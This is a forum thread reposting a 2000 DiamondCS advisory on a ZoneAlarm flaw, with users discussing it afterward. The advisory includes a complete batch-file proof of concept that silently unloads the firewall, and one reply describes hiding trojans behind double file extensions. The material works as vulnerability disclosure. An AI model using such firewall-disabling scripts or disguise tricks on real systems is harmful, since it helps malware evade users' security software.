zone alert takedown

[rwn]

Diamond Computer Systems Security Advisory

http://www.diamondcs.com.au/alerts/zonedown.txt

VULNERABILITY: ZoneAlarm and ZoneAlarm Pro can be taken down with a tiny batch file.

SEVERITY: Low-Medium, but as Zone Labs will not be fixing the problem it could be considered Medium-High.

AFFECTED SOFTWARE: "Zone Alarm" and "Zone Alarm Pro" (Zone Labs Inc. - www.zonelabs.com), possibly all versions.

REMOTE EXPLOIT: No.

RELEASE DATE: Friday Dec 29, 2000

VENDOR NOTIFIED: Zone Labs Inc. were notified on Wednesday Dec 27, 2000, but as Zone Labs have given a final response to this particular vulnerability, it can now be disclosed to the public.

---

DESCRIPTION:
ZoneAlarm and ZoneAlarm Pro, like all good multi-filed programs, supports an Uninstall feature. The Uninstall routine executes zonealarm.exe (or zapro.exe in the Pro version), vsmon.exe, and minilog.exe, passing special uninstall and unload parameters to each program. By doing this, ZoneAlarm shuts down it's user interface and services.

THE PROBLEM:
By design, ZoneAlarm\ZoneAlarm Pro has no way of determining WHICH program is calling it to unload, thus allowing a trojan to execute the ZoneAlarm programs in the same way to shut down the firewall.

THE EXPLOIT:
A very trivial exploit - all a trojan has to do is look in HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\ZoneAlarm\InstallDirectory to locate ZoneAlarm.exe (as just one of many ways to locate ZoneAlarm), then locate the Windows System32 directory before executing zonealarm.exe, vsmon.exe and minilog.exe, parsing each one the uninstall and unload parameters as specified in ZoneAlarm's Manual Uninstall.

ZONE LABS RESPONSE:
From Conrad Hermann, VP of Engineering at Zone Labs:
"...Of course, you are intended to be able to uninstall ZoneAlarm--as I'm sure you can tell, this is a very important thing to be able to do, since it is an introductory product for new users. In testing ZoneAlarm Pro, it seems you did not set a password, or else you would have reported that the password would be required to shut down using VSMON -unload. Without the password, vsmon -unload doesn't disable security."

In other words, if you get the buy-before-you-try version of ZA (ZoneAlarm Pro) AND you set passwords, you won't be vulnerable. As a matter of convenience, the majority of ZoneAlarm Pro users would _NOT_ use passwords - and by default there is no need for them to do so. It appears those who don't set passwords and regular ZoneAlarm users are left out in the cold with this one.

DEMONSTRATION:
Running this batch file will shut-down your ZoneAlarm\ZoneAlarm Pro firewall. The batch file assumes that you have installed ZoneAlarm\ZoneAlarm Pro into their default directory locations. Needless to say, this isn't a very efficient way of using the exploit, and a trojan would be a lot smarter in determining the locations of the four ZA executables, but this batch file demonstrates the simplicity of the vulnerability.

---File begins: ZONEDOWN.BAT ---
@echo off
@echo Shutting down ZoneAlarm and ZoneAlarm Pro, one moment...
c:\progra~1\zonela~1\zoneal~1\zapro.exe -unload
c:\progra~1\zonela~1\zoneal~1\zoneal~1.exe -unload
%windir%\system\zonelabs\vsmon.exe -unload -uninstall
%windir%\system\zonelabs\minilog.exe -unload -uninstall
%windir%\system32\zonelabs\vsmon.exe -unload -uninstall
%windir%\system32\zonelabs\minilog.exe -unload -uninstall
@echo Finished
@echo on
---File ends---


--
DiamondCS would like to thank Steve Gibson of grc.com for his mutual assistance to both DiamondCS and Zone Labs.

Publishing of this document is permitted providing the text is published in it's entirety and with no modifications.

Copyright (C) 2000, Diamond Computer Systems Pty. Ltd.
http://www.diamondcs.com.au - http://www.diamondcslabs.com

[Negative]

Did Steve Gibson help them with this? He's been calling ZoneAlarm the only safe firewall for years!

[rwn]

i guess so
the text of the message also indicates this

Any program can be terminated by trojans due to Windows flaws, recent trojans search for security software and terminate if found. diamond cs support are working on a new program which will protect against this, but for now you should turn on all scan options in Scan Control and run a full system scan to try to establish that you have no trojans. The programs could also be crashing, but you would usually see some message.

[Negative]

I just tried the batch-file:

- Unload: no problem: ZA just goes down, no warning, no nothing (trying to disable it in Windows does give a warning). That indeed is a flaw, but is it a Windows flaw or a ZA flaw?

- Uninstall: ZA still gives a warning, so this one can't be used (by trojans, that is).


Conclusion: unload yes, uninstall no way! Unloading ZA of course is the only thing necessary...

[rwn]

I dont know what to think really

one thing that bothers me though is how simple it is to put a trojan file with common name like

log.txt (.bat or exe or com hidden extra extention)

ie *.pif files are hard to find

or even explorer.exe (.pif)

in the root dirctory ( where it boots first)or in some other deeply nested but innapropriate dirctory eg where the dbx files for outlooks databases are stored

"sigh" new improved paranoiia seems to a benchmark these days

slightly off topic again ithought the privacy groups bugnosis programme is pretty clever
http://www.bugnosis.org/ Bugnosis

What do you think ?

[limp1058]

well alli know is that i usually keep zone alarm at the high setting and i know that norton tells me everyytime my boot files are messed with, so i think i'll be protected, maybe i missed seomthing but.....why would someone wanna run a batch file anyways, i mean, dos sucks

[ivan37]

Ok...it's not like someone can sit on the internet and stop your Zone Alarm remotely. They either 1. have to already have compromised your machine which means Zone Alarm already failed or 2. have to have physical access to your computer. If they already have physical access and they can run things, there are much worse things I would be worried about.

[limp1058]

Well yea, that makes sence, of course. I depend on zone alram and think is doing a great job so far.